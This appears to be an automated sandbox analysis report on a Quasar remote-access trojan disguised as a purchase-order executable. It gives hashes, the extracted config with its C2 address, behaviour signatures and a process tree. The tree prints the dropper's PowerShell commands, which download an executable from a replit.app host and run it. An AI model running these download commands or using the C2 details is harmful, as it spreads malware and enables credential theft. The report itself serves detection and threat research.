Analysis
max time kernel: 148s
max time network: 159s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29-07-2024 07:13
Static task: static1
Behavioral task: behavioral1
  Sample: jdconstructnOrderfdp..exe
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: jdconstructnOrderfdp..exe
  Resource: win10v2004-20240709-en
General
Target: jdconstructnOrderfdp..exe
Size: 288KB
MD5: 7e900eb50f9dc1cb5c68ffea4b9e7bcc
SHA1: 4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
SHA256: 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
SHA512: a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
SSDEEP: 3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Extracted
Family: quasar
Version: 1.4.1
Botnet (tag): Office04
C2: 192.228.105.2:4782
Mutex: 4ea5c3e6-40ed-401e-8a68-e96daa2a46a9
encryption_key: 0FE4B3C613E3E61C318BA9D568DC6A8C56D2E505
install_name: jorder.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: svchost
subdirectory: SubDir
Signatures

Quasar payload (2 IoCs)
  resource                                                                     yara_rule
  behavioral2/memory/1076-42-0x0000000005C10000-0x0000000005F35000-memory.dmp  family_quasar
  behavioral2/memory/1076-43-0x0000000006680000-0x00000000069A4000-memory.dmp  family_quasar
Credentials from Password Stores: Credentials from Web Browsers (1 TTPs)
  Malicious access or copy of web browser credential store.
Blocklisted process makes network request (2 IoCs)
  flow  pid   process
  23    764   powershell.exe
  25    3928  powershell.exe

Command and Scripting Interpreter: PowerShell
  pid   process
  764   powershell.exe
  3928  powershell.exe

Downloads MZ/PE file
.NET Reactor protector (2 IoCs)
  Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
  resource                                                                     yara_rule
  C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe                          net_reactor
  behavioral2/memory/1076-35-0x0000000000870000-0x00000000008DE000-memory.dmp  net_reactor
Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                  process
  Key value queried  \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation  jdconstructnOrderfdp..exe
Executes dropped EXE (1 IoCs)
  pid   process
  1076  networkrunfdp.exe
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application (2 TTPs, 1 IoCs)
  description      ioc                                                                                                                                                                                       process
  Set value (str)  \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkRun.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\networkrunfdp.exe"  networkrunfdp.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  jdconstructnOrderfdp..exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  networkrunfdp.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid   process
  764   powershell.exe
  764   powershell.exe
  3928  powershell.exe
  3928  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  764   powershell.exe
  Token: SeDebugPrivilege  3928  powershell.exe
  Token: SeDebugPrivilege  1076  networkrunfdp.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
  pid   process
  1076  networkrunfdp.exe
  1076  networkrunfdp.exe

Suspicious use of SendNotifyMessage (2 IoCs)
  pid   process
  1076  networkrunfdp.exe
  1076  networkrunfdp.exe

Suspicious use of WriteProcessMemory (9 IoCs)
  description                       pid   process                    target process
  PID 368 wrote to memory of 3640   368   jdconstructnOrderfdp..exe  cmd.exe
  PID 368 wrote to memory of 3640   368   jdconstructnOrderfdp..exe  cmd.exe
  PID 3640 wrote to memory of 764   3640  cmd.exe                    powershell.exe
  PID 3640 wrote to memory of 764   3640  cmd.exe                    powershell.exe
  PID 3640 wrote to memory of 3928  3640  cmd.exe                    powershell.exe
  PID 3640 wrote to memory of 3928  3640  cmd.exe                    powershell.exe
  PID 3640 wrote to memory of 1076  3640  cmd.exe                    networkrunfdp.exe
  PID 3640 wrote to memory of 1076  3640  cmd.exe                    networkrunfdp.exe
  PID 3640 wrote to memory of 1076  3640  cmd.exe                    networkrunfdp.exe
Processes

depth 1: C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
  PID: 368
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  depth 2: C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6DF.tmp\A6E0.tmp\A6F0.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
    PID: 3640
    - Suspicious use of WriteProcessMemory

    depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
      PID: 764
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"
      PID: 3928
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    depth 3: C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe
      Command line: networkrunfdp.exe
      PID: 1076
      - Executes dropped EXE
      - Adds Run key to start application
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (2)
    Credentials In Files (1)
    Credentials in Registry (1)
Downloads